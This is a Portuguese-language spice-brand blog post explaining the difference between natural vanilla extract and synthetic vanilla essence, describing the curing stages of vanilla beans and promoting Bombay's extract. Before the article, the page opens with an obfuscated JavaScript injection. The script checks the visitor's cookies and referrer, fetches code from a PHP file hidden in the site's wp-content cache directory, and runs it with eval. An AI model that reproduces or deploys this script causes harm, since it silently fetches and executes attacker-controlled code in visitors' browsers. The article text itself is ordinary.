;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//blog.bombayhs.com.br/wp-content/cache/asset-cleanup/css/item/inline/inline.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Caso já tenha se perguntado qual é a diferença entre extrato e essência de qualquer produto, a resposta é simples: extrato de baunilha é natural; essência é artificial.

Com a baunilha, que é o segundo ingrediente mais caro do mundo, atrás apenas do açafrão espanhol, funciona mais ou menos assim…

Extrato natural de baunilha e essência de baunilha

O que é extrato de baunilha?

Feito da imersão da fava de baunilha em bebida alcoólica. Sabe o favo de mel? Então, é algo meio parecido.

Essa fava de baunilha é picada ou triturada e mergulhada em vodka, conhaque ou rum.

Essa imersão leva pelo menos seis meses, para que o álcool consiga extrair todo o sabor.

Só por se tratar de um produto natural, é a melhor opção na hora de enriquecer o sabor dos pratos, principalmente os de confeitaria.

Chefes da alta gastronomia não abrem mão de um extrato de excelente qualidade.

E você também não precisa na hora de ir para a cozinha e preparar suas próprias receitas gourmet.

Muito mais prático que a fava de baunilha, basta acrescentar a gosto o extrato e se deliciar com as suas receitas.pudim com extrato de baunilha bombay

O que é a essência de baunilha?

Por sua vez, a essência de baunilha é totalmente sintética, servindo apenas para aromatizar ou harmonizar uma receita.

Neste caso, é muito usada na indústria alimentícia, de bebidas e de cosméticos, já que seu custo é muito menor se comparado com o do extrato da baunilha. Estima-se que apenas 1% da indústria usa baunilha natural.

Sua essência, todavia, é fácil de encontrar em sorvetes, bebidas lácteas e cremes hidratantes, entre outros que são incrementados com o ingrediente, que dá aquele perfume inconfundível.

Está fortemente associada ao tipo de cozinha que se fala muito hoje em dia, o comfort food.

Processo da baunilha para consumo

A baunilha para consumo passa por quatro etapas em seu processo: morte, transpiração, secagem e condicionamento do produto. Rapidamente, vejamos todas elas.

Morte: é quando as favas de baunilha são colhidas ainda vivas continuam mantendo a maioria de suas funções fisiológicas.

A morte acontece quando se escalda essas favas em água quente ou quando ocorrem queimaduras devido à exposição ao sol. Pode-se também levá-la ao forno, à cicatrização, ao tratamento com gás etileno ou mesmo ao congelamento.

Transpiração: é preciso deixar a fava transpirar em nível máximo a fim de reduzir a possibilidade de deterioração por causa de micróbios nas fases seguintes.

A cor da fava de baunilha como a conhecemos – achocolatada – surge nesta fase. Este processo leva de sete a dez dias.

Secagem: porque é preciso que elas sequem para reduzir interferência microbiana no resultado final.

Condicionamento: quando as favas são guardadas em caixas fechadas por vários meses para mais reações químicas e bioquímicas, o que influencia no aroma.

Apaixonados por cozinha podem fazer o seu próprio extrato de baunilha com alguma disposição. Contudo, apaixonado ou não, não deixe de usar esse ingrediente magnífico em suas receitas!

Receitas:

Com o extrato Bombay, você pode deixar a sua mente viajar e utilizá-lo em quase qualquer receita doce, como bolos, pudins, cheese cakes e até mesmo para adoçar o café de uma maneira muito mais especial e saborosa!

Onde comprar?

A Bombay foi a primeira a comercializar o extrato de baunilha natural no Brasil e é a marca número um deste item em vendas.

Conheça mais sobre o produto e saiba onde comprar clicando no link abaixo:

E não deixe de olhar o site da Bombay, você pode encontrar os melhores temperos para deixar suas receitas ainda melhores!

Para mais receitas e dicas, acompanhe nosso blog e marca a Bombay no nosso instagram para vermos como ficou essa receita!

3 Comentários

Deixe uma Resposta